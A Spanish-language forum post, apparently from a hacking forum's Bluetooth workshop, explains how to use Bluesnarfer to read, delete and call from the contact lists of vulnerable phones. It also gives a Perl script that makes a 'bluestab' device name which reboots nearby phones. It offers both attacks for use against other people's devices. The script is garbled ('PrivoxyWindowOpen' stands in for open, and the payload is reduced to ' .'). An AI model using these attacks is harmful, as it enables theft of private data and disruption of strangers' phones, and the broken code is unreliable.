PRIMERA PARTE
Lo que vamos a ver es cómo acceder a un teléfono movil con BT ( no todos los móviles son vulnerables). Como habréis leido en varias noticias, por ejemplo en la recopilación que hizo firos:
http://foro.elhacker.net/index.php/topic,77595.0.html
Se habla de bluesniffer, que con un portatil accediendo a un parlamento o senado no recuerdo bien, se hicieron con la agenda electrónica de muchos de los políticos, pues ahora os voy a mostrar cómo se hizo este ejercicio, bastante simple a pesar de parecer muy complicado.
Para ello necesitaremos un programa del mismo nombre blusnafer que podeis descargar aquí:
http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=277&title=Bluesnarfer%200.1
Este pequeña utilidad permite por medio de comandos acceder a ciertos teléfonos móviles vulnerables, y conseguir ver un listado de las últimas llamadas, ver la agenda electronica, borrarla, hacer llamadas , etc... todo esto lo podéis ver en el siguiente video explicativo bastatne corto y muy demostrativo de lo simple que resulta hacer todo esto:
http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=280&title=Video%20tutorial%20de%20blue%20snarfer
Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218
SEGUNDA PARTE
En esta segunda parte voy a mostrar algo bien simple, es una vulnerabilidad conocida como bluestab, (puñalada azul) la cual permite el reinicio de ciertos dispositivos vulnerables, para lo cual basta con cambiar el nick de tu dispositivo movil, esto es debido a usar una parte de código hexadecimal en el nick que provoca que ciertos teléfonos se bloquen y es reinicien automaticamente, esta vulnerabilidad es muy curiosa ya que simplemente con tener este nick, cuando alguien busque dispositivos BT y encuentre el tuyo, se reiniciará automaticamente sin saber el motivo. Para realizar esto basta con usar el siguiente programa que os creará un nick "xploit", que debereis copiar luego como nick.
Código:
nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n********************** ************************************************** **************************** ************\n
";
print "****************** Reinicio de dispositivos vulnerables por medio de nombre en dispositivo BT ********************\n";
print "** mas información sobre su uso en http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=217 **\n";
print "***************** [::wormz::] www.wormzweb.tk *****************\n";
print "************************* ****************************** ****************************** ******************************\n";
print " \n Escribe tu nick : ";
$btnick = <STDIN>;
chomp($btnick);
print " \n OUTPUT : ";
$file = <STDIN>;
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") || die "No se ha podido crear el archivo $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n ¡Finalizado! , Envia el texto a tu teléfono y copialo en el nombre de tu telefono BT \n\n";
-------------end-----------------
Bueno como he dicho este programilla os creará un fichero que debeis enviar a vuestro movil y copiarlo en el nick.
Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218
TERCERA PARTE:
Bueno, siento no ser mas comleto en todo esto pero estoy aún bastante liado, espero que en unos dias tener mas tiempo y poder ser mas específico y explicar todo mas en profundidad para los que le gusta la teoría, también para los que les gusta juguetear con pequeñas aplicaciones les recomiendo que vean la noticia que puse en mi web sobre hack BT, en la que hay unas pequeñas aplicaciones para descargar muy simples, que por lo general son escaneadores con diferentes utilidades y bastante interesantes.
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218
Espero haber servido de ayuda en el taller y que sea una aportación mas al taller BT.
Un saludo xXx